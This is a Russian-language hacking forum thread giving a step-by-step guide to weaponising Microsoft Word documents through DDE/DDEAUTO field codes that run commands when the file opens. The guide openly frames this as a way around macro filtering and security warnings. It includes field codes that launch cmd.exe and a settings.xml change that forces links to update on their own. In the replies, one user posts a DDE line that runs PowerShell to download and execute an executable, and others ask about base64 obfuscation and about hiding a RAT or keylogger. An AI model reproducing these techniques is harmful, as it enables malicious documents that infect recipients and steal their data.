• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Статья DDE на замену макросам.

IioS

IioS

Well-known member
09.06.2017
244
489
Предыстроия простая, посматривая просторы интернета, наткнулась на статью тут: она декламирует что есть способ по создание метода который вытеснит макросы, и я загорелась желанием узнать способ создание. О своем опыте и будет эта статья.

DDE – это Microsoft Dynamic Data Exchange, позволяет выстаивать кастомное поле, в нем и создастся путь для подгружать данные из других приложений семейства Microsoft.

Протокол DDE представляет собой набор сообщений и рекомендаций. Он отправляет сообщения между приложениями, которые использует общую память для обмена данными. Приложения могут использовать протокол непрерывного обмена, когда приложения отправляют обновления друг другу по мере поступления новых данных.

Использование DDE в Excel или Word для вредоносных целей может быть весьма полезным, потому что макросы могут быть отфильтрованные почтовыми шлюзами и корпоративной политикикой VBA. Кроме того использование DDE в MSWord так же просто, как добавление поля и выполнение следующего:

1 шаг - Тык на: «Вставить», «Быстрые элементы», «Поле»:
DDE на замену макросам.


2 шаг - Мы выбрали «= (Формула)» и Ok:
DDE на замену макросам.


Альтернативный метода мы можем просто добавить поле, нажав CTRL + F9

3 шаг - После этого мы увидим поле, вставленное в документ, с ошибкой «Ошибка в формуле». Щелкните правой кнопкой мыши по полю и выберите «Включить или отключить коды полей»
DDE на замену макросам.


4 шаг - Получаем это:
DDE на замену макросам.


5 шаг - Мы должны изменить на следующее то что было на это:
Код:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }
Ключевое слово DDEAUTO указывает MSWord, что это поле DDE и будет запускаться автоматически при открытии документа, вторая часть - полный путь к исполняемому файлу, который запускается, а последняя часть в кавычках - это аргументы для передачи (выполнить calc .exe).

Теперь мы сохраняем документ как обычный «.docx» и открываем его на любом компьютере. Первое предостережение - обновить ссылки на документы, там ничего злонамеренного.

6 шаг - Открывается пару окон, мы тыкаем да, да, и у нас открывается консоль, и она уже открывает то что мы хотим, в нашем случае калькулятор.

DDE на замену макросам.


Теперь разберем выхлоп: Первое предостережение - обновить ссылки на документы, там ничего злонамеренного.
Второе - приглашение - запрашивает у пользователя, следует ли запускать указанное приложение, это можно рассматривать как предупреждение о безопасности, поскольку оно предлагает пользователю запустить «cmd.exe», однако с соответствующей модификацией синтаксиса вы можете скрыть ...

То же самое можно достичь с помощью идентификатора поля «DDE»:
Код:
{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad"}
Но в этом случае нам придется изменить .docx, чтобы включить автоматическое обновление ссылок. Для этого распакуйте файл .docx, отредактируйте word/settings.xml и вставьте следующий тег XML:
Код:
<w:updateFields w:val="true"/>
Затем мы сохраняем файл конфигурации и обновляем файл. Когда вы откроете его, Word предложит вам обновить ссылки с помощью немного другого приглашения, чем раньше, но с тем же результатом, что и DDEAUTO.
И самое лучшее, никаких макросов, никаких предупреждений о безопасности, что САМОЕ главное.

Спасибо за внимание и до новых встреч.
ps - надеюсь картинки нормально отобразятся :)
pss - а приветствие в конце, спасибо что остались до этих строк!
 
B

Breed

Заблокирован
18.06.2017
194
242
А MS не считает это опасностью и даже не чешется исправлять этот косячок! :)

Так что, скорее всего, этот вариант можно будет эксплуатировать в различных вариациях очень долго.
 
IioS

IioS

Well-known member
09.06.2017
244
489
Забыла добавить! Палевность в DDE очень маленькая.
6.png
 
LoRaX

LoRaX

Member
25.01.2017
5
4
Действительно интересный метод, спасибо :D
 
I

Inject0r

Самое главное, что касперский сразу палит вирус в файлике. И судя по скрину выше все остальные топовые антивирусники - полная фигня.
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
Отлично статья. Вот пример хорошей качественной статьи. Есть описание о чем речь. Тема хорошо названа. Есть четкий алгоритм действий. Супер вообщем. Единственное. Зачем под хайд класть это "Альтернативный метода мы можем просто добавить поле, нажав CTRL + F9"? П.С. Репой поделился.
 
IioS

IioS

Well-known member
09.06.2017
244
489
Репой поделился.
Очень благодарна.
Зачем под хайд класть это "Альтернативный метода мы можем просто добавить поле, нажав CTRL + F9"
Почему-то захотелось под хайд, хотя он доступен любому кто уделил 2 минуты на регестрацию, но я на будущие учту.
 
☠xrahitel☠

☠xrahitel☠

Well-known member
09.12.2016
163
268
Очень благодарна.

Почему-то захотелось под хайд, хотя он доступен любому кто уделил 2 минуты на регестрацию, но я на будущие учту.
статья вышла раньше и лежит на всех бордах новостных
 
IioS

IioS

Well-known member
09.06.2017
244
489
статья вышла раньше и лежит на всех бордах новостных
Я не позиционировала этот метод как уникальный, а как свой опыт, все было так как я описала в начале, увидела что есть такой способ, нашла его реализацию, и решила описать это тут.
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
Главное не копипаст. Видна работа автора. Но если бы довела до РЦЕ поставил бы два плюсика но и без этого годнота.
 
☠xrahitel☠

☠xrahitel☠

Well-known member
09.12.2016
163
268
Главное не копипаст. Видна работа автора. Но если бы довела до РЦЕ поставил бы два плюсика но и без этого годнота.
да у меня не было умысла в чем-то изобличать автора,на оборот поддерживаю что хайд не влепила до потолка :)
 
tumm

tumm

Member
10.10.2017
20
8
Можно пожалуйста поподробней-как поменять сообщения при открытии документа.
 
SooLFaa

SooLFaa

Администратор
15.07.2016
814
1 318
Завтра дополню тему полезной нагрузкой
 
D

Dmitry88

Завтра дополню тему полезной нагрузкой
C word'ом получилось скрыть строку с вызовом cmd. А что делать с excel ? Поля та там обрабатываются нормально. Вызов powershell с invoke webrequest тоже. Но вот окно с вызовом cmd не нашел где убрать.

ПС: Может обновлять этот пост, что бы не пилить новые ?
[doublepost=1508930746,1508305581][/doublepost]Удалось выполнить скачивание и запуск exe. К сожалению много ругани и всплывающих окон.
{DDE "c:\\windows\\System32\\cmd.exe " "/c powershell.exe (New-Object System.Net.WebClient).DownloadFile(' '%TEMP%\\abcde123.exe'"}

PS: Подскажите по шифрованию строки в base64. У меня упорно PS на синтаксис ругается. (PS 4.0)
 
  • Нравится
Реакции: Smike и IioS
A

Antisocial

К удалению 21.01.2019
19.09.2017
1
0
Неужели это не профиксили ? (не убрали дефолт настройки)
 
A

Anspirer

Ребят , а подскажите, RAT или кейлогер скрытый , можно туда засунуть?
 
Мы в соцсетях:  ТелеграмВконтактеДзенФейсбукТвиттерЮтуб